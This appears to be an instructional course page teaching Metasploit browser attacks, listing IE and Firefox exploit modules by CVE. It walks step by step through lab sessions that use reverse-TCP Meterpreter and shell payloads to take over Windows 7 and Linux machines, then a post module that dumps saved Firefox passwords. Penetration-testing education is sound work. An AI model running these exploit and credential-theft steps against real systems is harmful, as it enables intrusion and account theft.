03- Metasploit Basics- Attacking the Browser
When first learning about offense, students are often bewildered by the variety of different attacks that exist against a system, and often begin to believe that any system is vulnerable to anything. This changes quickly to frustration as they discover that exploits are finicky and need to be selected for the right version; moreover it seems inevitable that the target doesn’t quite have the right software.
Other students are put off by the learning curve that is Metasploit. Though it is powerful and contains many of the publicly known exploits, it does require a certain amount of knowledge to get started. There are some nice books out there- I do like Metasploit: The Penetration Tester’s Guide Paperback by Kennedy, O’Gorman, Kearns & Aharoni, but I have found this book is tough on beginners. It does a fantastic job introducing the various commands and techniques to get Metasploit running, but it never really explains which exploit is appropriate for which target, or how to select an exploit.
The purpose of this page is to provide a (very) brief introduction to the use of Metasploit as a platform to attack browsers; specifically we will learn about some attacks that target either Internet Explorer or Firefox. Why Internet Explorer? Simply, it is common, easily exploitable if patches have not been applied, but something that should not be found unpatched in the wild. Firefox may be a little less common, at least on Windows systems, but many versions of Linux ship with Firefox as their default browser.
Internet Explorer
Before attacking IE (or any other piece of software), it is important to know exactly which versions are vulnerable to which exploits. Although the current version of IE is now IE 10, it turns out that most modules target IE 8 only; there are only a few very recent ones that target IE 9. Moreover most exploits also require a version of Java 6 on the target; this is used not so much for the exploit as to provide a ROP Chain to allow shellcode to be executed. Thus, you cannot simply attack "Internet Explorer"- you need to know which version, and often need to have some other fortunate pieces of software installed on the target.
Here is a list of Metasploit modules for Internet Explorer- at least those recent modules that attack systems post-XP. Notice that none of these modules (yet) suffice against a Win 8 target.
Metasploit Modules for Internet Explorer
- MS10-02 Internet Explorer Object Memory Use-After-Free
- Win 7, SP0.
- CVE 2010-0248, MS 10-002
- Internet Explorer CSS Recursive Import Use After Free
- Requires .NET 2.0.50727 on target.
- CVE 2010-3971, MS 11-003
- MS11-050 IE mshtml!CObjectElement Use After Free
- Works on Vista & Win 7, but Java 6 is required on the target for Win 7.
- CVE 2011-1260, MS 11-050
- Microsoft Internet Explorer Option Element Use-After-Free
- Vista & Win7
- CVE 2011-1996, MS 11-081
- MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
- Vista (SP 2), Win 7 (SP 1). Java 6 is required on the target.
- CVE 2012-1875, MS 12-037
- Microsoft Internet Explorer Fixed Table Col Span Heap Overflow
- Win 7 (SP 1). Java 6 is required on the target. The Java requirement is not mentioned on the Rapid 7 page, but it has been my experience that it is, indeed, needed on Win 7 SP1.
- CVE 2012-1876, MS 12-037
- MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption
- Vista (SP 2), Win 7 (SP 1, IE 8 or IE 9). Java is required on the target.
- I had trouble getting this to work; it failed two attempts against Win7 machines: Win 7 (x64) SP1, IE 9, Java 6 Update 32 and Win 7 (x64) SP1, IE 8, Java 6 Update 27.
- CVE 2012-1889, MS 12-043
- Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability
- Vista, Win 7, 2003.
- Although not listed, it seems to work happily against Win 7 (x64) SP1 with Java 6 Update 27. It did fail against IE 9.
- CVE 2012-4782, MS 13-008
- MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
- Vista (IE 7,8), Win 7 (IE 8,9). Java 6 is required on the target.
- I was able to exploit a Win 7 (SP 1) system with IE 8 (Java 6 Update 27), but could not exploit a Win 7 (SP 1) system with IE 9 (Java 6 Update 32)
- CVE 2012-4969. MS 12-063
- MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
- Vista, Win 7, 2003
- Although not listed, it appears that Java 6 is required on the target, as tests against Win 7 (SP 1) without Java have failed.
- Although not listed, it seems to work happily against Win 7 (x64) SP 1 with Java 6 Update 27.
- CVE 2013-1347, MS 130-038
- MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
- Win 7 (SP 1)
- Java is not required on the target; they state that "This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001)"
- Tests against a Win 7 (x64) SP 1 system with ntdll.dll v6.1.7601.17514 have failed though.
- CVE 2013-2551, MS 13-037
- MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
- Win 7 (SP 1). Java 6 is apparently required on the target, as tests against Win 7 (SP 1) without Java have failed.
- CVE 2013-3163, MS 13-055
- MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free
- Win 7 (SP 1) IE 9. [Only IE 9 with mshtml.dll 9.0.8112.16446, but not for 9.0.8112.16421]
- CVE 2013-3184, MS 13-059
- Microsoft Internet Explorer SetMouseCapture Use-After-Free
- Win 7 (SP 1) IE 9 with Office 2007 or Office 2010
- CVE 2013-3893, MS 13-080
- MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free
- Win 7 (SP 1), IE 10
- Flash Player 12 is required on the target
- CVE 2014-0322, MS 14-012
Using Metasploit to launch an attack
The use of all of these modules follows the same general pattern, so though I am going to demonstrate one attack, you will find that the same steps work for just about all of these modules. Let’s use the MS13-055 CAnchor attack, so start by firing up Metasploit and selecting the exploit:
=[ metasploit v4.8.0-2013112001 [core:4.8 api:1.0] + -- --=[ 1220 exploits - 667 auxiliary - 191 post + -- --=[ 324 payloads - 30 encoders - 8 nops msf > use exploit/windows/browser/ms13_055_canchor msf exploit(ms13_055_canchor) >
If you are wondering how to determine the module name for a particular attack, check the module name on the documentation page at Rapid 7. With the exploit selected, we start by seeing what options we need to set:
msf exploit(ms13_055_canchor) > show options Module options (exploit/windows/browser/ms13_055_canchor): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Automatic
Most of these variables are self-explanatory. The SRVHOST variable is the IP address of the server; by leaving at 0.0.0.0 we’ll bind a server to all of the IP addressed on the host. The SRVPORT variable is the port- let’s change that to port 80 just to see how to change a variable:
msf exploit(ms13_055_canchor) > set SRVPORT 80 SRVPORT => 80
Then if we check the options again, we find
msf exploit(ms13_055_canchor) > show options Module options (exploit/windows/browser/ms13_055_canchor): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Automatic
The next few variables are needed only if we want the server to use SSL; since we don’t need to do so in this simple example, let’s leave them untouched. The URIPATH variable specified the URI for the exploit. Let’s be simple, and map our exploit to the root web page
msf exploit(ms13_055_canchor) > set URIPATH / URIPATH => /
Next we need to look at the targets. Although the module has an "automatic" setting, you should try to customize this to your target(s). To enumerate the possible targets, the show targets
command is used
msf exploit(ms13_055_canchor) > show targets Exploit targets: Id Name -- ---- 0 Automatic 1 IE 8 on Windows XP SP3 2 IE 8 on Windows 7
Then, since our target is a Windows 7 system, we can just run
msf exploit(ms13_055_canchor) > set target 2 target => 2 msf exploit(ms13_055_canchor) > show options Module options (exploit/windows/browser/ms13_055_canchor): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 2 IE 8 on Windows 7
Now that the targeting information is set, we need to select a payload to be delivered after a successful exploit. There are any number of reasonable payloads, but the simplest and most robust is likely the Meterpreter tool delivered via reverse TCP. Meterpreter is a powerfull remote access tool, and setting it to use reverse TCP means that he target host will connect to us (rather than the reverse), and so avoiding ingress firewall and NAT problems.
msf exploit(ms13_055_canchor) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
Once the payload is chosen, additional variables need to be set
msf exploit(ms13_055_canchor) > show options Module options (exploit/windows/browser/ms13_055_canchor): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 2 IE 8 on Windows 7
The EXITFUNC variable can be left in its current state, but we must set the LHOST variable. This is the IP address of the host that our target will connect back to. If we set this to be the same as the address of our attacking system, Metasploit will set up a listener to handle the connections automatically. Since the IP address of the attacking system is 10.0.2.120
msf exploit(ms13_055_canchor) > ifconfig [*] exec: ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:25:83:4d inet addr:10.0.2.130 Bcast:10.0.2.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe25:834d/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:9709 errors:0 dropped:0 overruns:0 frame:0 TX packets:16143 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1372340 (1.3 MiB) TX bytes:20414400 (19.4 MiB) Interrupt:19 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:154379 errors:0 dropped:0 overruns:0 frame:0 TX packets:154379 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:26313580 (25.0 MiB) TX bytes:26313580 (25.0 MiB) msf exploit(ms13_055_canchor) > set LHOST 10.0.2.130 LHOST => 10.0.2.130
we just change the variable as we have done before.
One last check that we have our options set correctly, then run the command exploit
:
msf exploit(ms13_055_canchor) > show options Module options (exploit/windows/browser/ms13_055_canchor): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 10.0.2.130 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 2 IE 8 on Windows 7 msf exploit(ms13_055_canchor) > exploit [*] Exploit running as background job. msf exploit(ms13_055_canchor) > [*] Started reverse handler on 10.0.2.130:4444 [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://10.0.2.130:80/ [*] Server started.
From this we see that we have started a background job, and that the system is now listening on 10.0.2.130:80 (and 0.0.0.0:80) for connections.
At this point, we now need our victim to browse to http://10.0.2.130 using a vulnerable version of IE. Let’s do so, with IE 8 on a Windows 7 (x64) SP 1 system. In this case, Internet Explorer will try to load the page and fail; it will then try again and fail again, leaving the user with a message
Over on the attacking system, well, things are different:
[*] 10.0.2.129 ms13_055_canchor - Using JRE ROP [*] 10.0.2.129 ms13_055_canchor - Sending exploit... [*] Sending stage (769024 bytes) to 10.0.2.129 [*] 10.0.2.129 ms13_055_canchor - Using JRE ROP [*] 10.0.2.129 ms13_055_canchor - Sending exploit... [*] Meterpreter session 1 opened (10.0.2.130:4444 -> 10.0.2.129:49173) at 2013-11-24 12:43:42 -0500 [*] Session ID 1 (10.0.2.130:4444 -> 10.0.2.129:49173) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2996) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2900 [*] 10.0.2.129 ms13_055_canchor - Using JRE ROP [*] 10.0.2.129 ms13_055_canchor - Sending exploit... [*] Sending stage (769024 bytes) to 10.0.2.129 [*] 10.0.2.129 ms13_055_canchor - Using JRE ROP [*] 10.0.2.129 ms13_055_canchor - Sending exploit... [+] Successfully migrated to process [*] Meterpreter session 2 opened (10.0.2.130:4444 -> 10.0.2.129:49176) at 2013-11-24 12:43:50 -0500 [*] Session ID 2 (10.0.2.130:4444 -> 10.0.2.129:49176) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1956) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2064 [+] Successfully migrated to process
Reading this, you can see that IE made two calls to the web page- one initiated by the user, and a second when the first appeared to fail. (Isn’t IE nice!)
We interact with Meterpreter in the usual fashion:
msf exploit(ms13_055_canchor) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN7SP1\seldon @ WIN7SP1 10.0.2.130:4444 -> 10.0.2.129:49173 (10.0.2.129) 2 meterpreter x86/win32 WIN7SP1\seldon @ WIN7SP1 10.0.2.130:4444 -> 10.0.2.129:49176 (10.0.2.129) msf exploit(ms13_055_canchor) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN7SP1 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_US Meterpreter : x86/win32 meterpreter > getuid Server username: WIN7SP1\seldon meterpreter >
Firefox
Although there are vulnerabilities in Firefox, there are fewer than in Internet Explorer. There are two primary attack vectors that can be used against Firefox:
- Firefox 17.0.1 Flash Privileged Code Injection
- Firefox 17 or Firefox 17.0.1. Requires a version of Flash Player installed
- OS: Windows, Linux, Apple
- CVE-2013-0758
- Firefox 5.0 – 15.0.1 __exposedProps__ XCS Code Execution
- Firefox 5 – Firefox 15.0.1.
- OS: Windows, Linux, Apple
- CVE-2012-3993, CVE-2013-1710
Both of these are reliable, cross platform exploits. The first requires a version of Flash, but this is not uncommon; the second and older attack has no such additional requirements. There are other, less widely applicable Metasploit modules that attack Firefox: Firefox XMLSerializer Use After Free and Firefox onreadystatechange Event DocumentViewerImpl Use After Free with the first affecting Firefox 17 – 17.0.1, and the second affecting Firefox 17.0.6. The catch with these modules though, is that they only appear to work against Windows XP targets.
These attacks follow the same template we saw in our attacks against Internet Explorer. As an example, let’s try the Firefox 5.0 – 15.0.1 __exposedProps__ XCS Code Execution against a default Mint 13 (Cinnamon); this system ships with Firefox 12 as its default unpatched browser. We start by setting up the exploit in Metasploit in the same fashion, with the same basic variables. We make two changes; first and somewhat obviously we change to a Linux specific meterpreter payload. The other change is that the exploit does need a non-null URI, so we’ll go ahead and let Metasploit choose a random URI for us.
msf > use exploit/multi/browser/firefox_proto_crmfrequest msf exploit(firefox_proto_crmfrequest) > set SRVPORT 80 SRVPORT => 80 msf exploit(firefox_proto_crmfrequest) > show targets Exploit targets: Id Name -- ---- 0 Generic (Java Payload) 1 Windows x86 (Native Payload) 2 Linux x86 (Native Payload) 3 Mac OS X PPC (Native Payload) 4 Mac OS X x86 (Native Payload) msf exploit(firefox_proto_crmfrequest) > set target 2 target => 2 msf exploit(firefox_proto_crmfrequest) > set payload linux/x86/meterpreter/rev erse_tcp payload => linux/x86/meterpreter/reverse_tcp msf exploit(firefox_proto_crmfrequest) > set lhost 10.0.2.128 lhost => 10.0.2.128 msf exploit(firefox_proto_crmfrequest) > show options Module options (exploit/multi/browser/firefox_proto_crmfrequest): Name Current Setting Required Description ---- --------------- -------- ----------- ADDONNAME HTML5 Rendering yes The addon name. Enhancements AutoUninstall true yes Automatically uninstall the addon after payload execution CONTENT no Content to display inside the HTML . Retries true no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- DebugOptions 0 no Debugging options for POSIX meterpreter LHOST 10.0.2.128 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 2 Linux x86 (Native Payload) msf exploit(firefox_proto_crmfrequest) > exploit [*] Exploit running as background job. [*] Started reverse handler on 10.0.2.128:4444 [*] Using URL: http://0.0.0.0:80/VLQsmEH [*] Local IP: http://10.0.2.128:80/VLQsmEH [*] Server started.
Then, if the victim visits that page, all they see is a blank browser
At the same time though, Metasploit spawns a shell for us:
[*] 10.0.2.139 firefox_proto_crmfrequest - Gathering target information. [*] 10.0.2.139 firefox_proto_crmfrequest - Sending HTML [*] 10.0.2.139 firefox_proto_crmfrequest - Sending the malicious addon [*] Transmitting intermediate stager for over-sized stage...(100 bytes) [*] Sending stage (1228800 bytes) to 10.0.2.139 [*] Meterpreter session 1 opened (10.0.2.128:4444 -> 10.0.2.139:53602) at 2014-01-10 19:09:37 -0500 msf exploit(firefox_proto_crmfrequest) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : mint-base OS : Linux mint-base 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 (x86_64) Architecture : x86_64 Meterpreter : x86/linux meterpreter >
Now What?
Now simply having local access to a browser does not seem that significant- but what if the user has used Firefox to log in to other privileges sites? Say the admin page for a Zen Cart installation? Is there something we could then do to grab these credentials?
Why, yes! There is a post module just for Firefox that will gather passwords from the browser. The module has the clever name Firefox Gather Passwords from Privileged Javascript Shell and it runs like most post modules.
To see it in use, let’s pop another browser, this time using the svg plugin attack. We’ll use a different payload here- the firefox command shell.
msf > use exploit/multi/browser/firefox_svg_plugin msf exploit(firefox_svg_plugin) > show options Module options (exploit/multi/browser/firefox_svg_plugin): Name Current Setting Required Description ---- --------------- -------- ----------- CONTENT no Content to display inside the HTML <body>. DEBUG false no Display some alert()'s for debugging the payload. Retries true no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Universal (Javascript XPCOM Shell) msf exploit(firefox_svg_plugin) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- firefox/exec normal Firefox XPCOM Execute Command firefox/shell_bind_tcp normal Command Shell, Bind TCP (via Firefox XPCOM script) firefox/shell_reverse_tcp normal Command Shell, Reverse TCP (via Firefox XPCOM script) generic/custom normal Custom Payload generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline msf exploit(firefox_svg_plugin) > set payload firefox/shell_reverse_tcp payload => firefox/shell_reverse_tcp msf exploit(firefox_svg_plugin) > set lhost 10.0.1.9 lhost => 10.0.1.9 msf exploit(firefox_svg_plugin) > exploit -j [*] Exploit running as background job. msf exploit(firefox_svg_plugin) > [*] Started reverse handler on 10.0.1.9:4444 [*] Using URL: http://0.0.0.0:8080/RUh2fKRSf55FQ9 [*] Local IP: http://10.0.1.9:8080/RUh2fKRSf55FQ9 [*] Server started. msf exploit(firefox_svg_plugin) > [*] 10.0.2.100 firefox_svg_plugin - Gathering target information. [*] 10.0.2.100 firefox_svg_plugin - Sending response HTML. [*] 10.0.2.100 firefox_svg_plugin - Target selected: Universal (Javascript XPCOM Shell) [*] 10.0.2.100 firefox_svg_plugin - Sending Firefox 17.0.1 Flash Privileged Code Injection [*] 10.0.2.100 firefox_svg_plugin - Sending .swf trigger. [*] 10.0.2.100 firefox_svg_plugin - Sending .swf trigger. [*] Command shell session 1 opened (10.0.1.9:4444 -> 10.0.2.100:39725) at 2014-05-17 17:49:57 -0400
Once we have the shell, we simply run the post module to dump the credentials to a file.
msf exploit(firefox_svg_plugin) > use post/firefox/gather/passwords msf post(passwords) > show options Module options (post/firefox/gather/passwords): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. TIMEOUT 90 yes Maximum time (seconds) to wait for a response msf post(passwords) > set session 1 session => 1 msf post(passwords) > run [*] Running the privileged javascript... [+] Saved 2 passwords to /root/.msf4/loot/20140517175026_default_10.0.2.100_firefox.password_264676.bin [*] Post module execution completed
Taking a look at the result, you will see data like
{"password":"password1!", "passwordField":"passwd","username":"admin", "usernameField":"username","httpRealm":"", "formSubmitURL":"http://pollux.cosc.tu", "hostname":"http://pollux.cosc.tu"} {"password":"password2@","passwordField":"password", "username":"bob@classex.tu", "usernameField":"email_address","httpRealm":"", "formSubmitURL":"https://pollux.cosc.tu", "hostname":"https://pollux.cosc.tu"}
I am sure you can imagine how useful this data might be….
Now if you are just learning about Metasploit, you probably now want to know all about Meterpeter- what can we do at this point now that we have a beachhead on the target system. Well, that will have to wait for another day….
I’m trying to setup a demo for phishing talk I’m giving to employees in the near future, but I cannot seem to get any exploit working properly. For instance, the target machine is a Windows 7 sp1 box with IE8. Firewall is off, Defender is off. I tried the exploit you demonstrated (along with several others) and metasploit seems to hang “Sending exploit”. Meterpreter doesn’t load. I’m doing this between two VMs on Virtualbox sharing a host only network. Any suggestions would be appreciated.
At a guess, be sure that the payload has the IP address of the Kali box set as the LHOST variable.